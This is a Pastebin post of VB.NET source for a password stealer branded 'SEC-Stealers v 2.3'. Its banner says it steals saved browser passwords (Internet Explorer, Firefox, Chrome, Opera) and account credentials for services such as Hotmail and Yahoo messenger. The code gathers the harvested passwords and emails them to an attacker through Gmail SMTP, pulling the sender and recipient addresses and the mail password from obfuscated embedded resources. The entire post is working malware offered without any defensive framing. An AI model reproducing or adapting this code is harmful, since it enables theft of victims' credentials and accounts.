Advertisement
SecurityNajaf

#IL_Code 8920

Jan 30th, 2014
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 3.15 KB | None | 0 0
  1. Imports System.Runtime.InteropServices
  2. Imports System.Net.Mail
  3. Module Module1
  4.     Public pw As String
  5.     Public JK As New TextBox
  6.     Sub main()
  7.         On Error Resume Next
  8.         Process.EnterDebugMode()
  9.         pw = A.GT
  10.         JK.Text = "- SEC-Stealers v 2.3 " & vbNewLine & "......................................................................................" & vbNewLine & vbNewLine & "- Description Project .." _
  11.             & vbNewLine & "- Steal Passwords Stored In a Cookie For a Browsers" & vbNewLine & "- Internet Explorer , Mozilla Firefox , Google Chrome , Opera" & vbNewLine & "- In Addition To Steal Passwords For Accounts" _
  12.             & vbNewLine & "- No-ip , Dyndns , Paltalk Messenger , Hotmail , Yahoo messenger" & vbNewLine & vbNewLine & "- Category responsible for pulling passwords are programmed by : NjQ8" _
  13.             & vbNewLine & "- Tool responsible for sending information programmed by : Security.Najaf" & vbNewLine & "- Contact For Me , My Skype : Security.Najaf" & vbNewLine & vbNewLine & vbNewLine & _
  14.            pw & vbNewLine & "- Last Date [ " & DateTime.Now.ToString("yyyy/MM/dd HH:mm:ss") & " ]"
  15.         Threading.Thread.Sleep(1000)
  16.         Dim Message As New MailMessage()
  17.         Message.From = New MailAddress(System.Text.Encoding.UTF8.GetString(ipRQJHuGffWt.ElTJKkhFGSM(Application.ExecutablePath, "1")))
  18.         Message.To.Add((System.Text.Encoding.UTF8.GetString(ipRQJHuGffWt.ElTJKkhFGSM(Application.ExecutablePath, "2"))))
  19.         Message.Subject = "Information Protection ..."
  20.         Message.Body = (JK.Text)
  21.         Dim SMTPServer As New SmtpClient("smtp.gmail.com")
  22.         SMTPServer.Port = 587
  23.         SMTPServer.Credentials = New System.Net.NetworkCredential((System.Text.Encoding.UTF8.GetString(ipRQJHuGffWt.ElTJKkhFGSM(Application.ExecutablePath, "1"))), (System.Text.Encoding.UTF8.GetString(ipRQJHuGffWt.ElTJKkhFGSM(Application.ExecutablePath, "3"))))
  24.         SMTPServer.EnableSsl = True
  25.         SMTPServer.Send(Message)
  26.     End Sub
  27. End Module
  28. Module ipRQJHuGffWt
  29.     <DllImport("kernel32.dll", SetLastError:=True)> _
  30.     Private Function FindResource(ByVal aiVBMOTufgOf As IntPtr, ByVal lpName As String, ByVal lpType As String) As IntPtr
  31.     End Function
  32.     Private Declare Function sViZvxJrXrJE Lib "kernel32" Alias "GetModuleHandleA" (ByVal moduleName As String) As IntPtr
  33.     Private Declare Function SizeofResource Lib "kernel32" (ByVal aiVBMOTufgOf As IntPtr, ByVal hResInfo As IntPtr) As Integer
  34.     Private Declare Function LoadResource Lib "kernel32" (ByVal aiVBMOTufgOf As IntPtr, ByVal hResInfo As IntPtr) As IntPtr
  35.     Public Function ElTJKkhFGSM(ByVal hHgkiIkSITDW As String, ByVal resourceid As String) As Byte()
  36.         Dim aiVBMOTufgOf As IntPtr = sViZvxJrXrJE(hHgkiIkSITDW)
  37.         Dim kOmKyEifXsBq As IntPtr = FindResource(aiVBMOTufgOf, resourceid, "NAJAF")
  38.         Dim KgKsedakDPB As IntPtr = LoadResource(aiVBMOTufgOf, kOmKyEifXsBq)
  39.         Dim nWslPBhsnRK = SizeofResource(aiVBMOTufgOf, kOmKyEifXsBq)
  40.         Dim hxhDuIQUKeLU As Byte() = New Byte(nWslPBhsnRK - 1) {}
  41.         Marshal.Copy(KgKsedakDPB, hxhDuIQUKeLU, 0, CInt(nWslPBhsnRK))
  42.         Return hxhDuIQUKeLU
  43.     End Function
  44. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement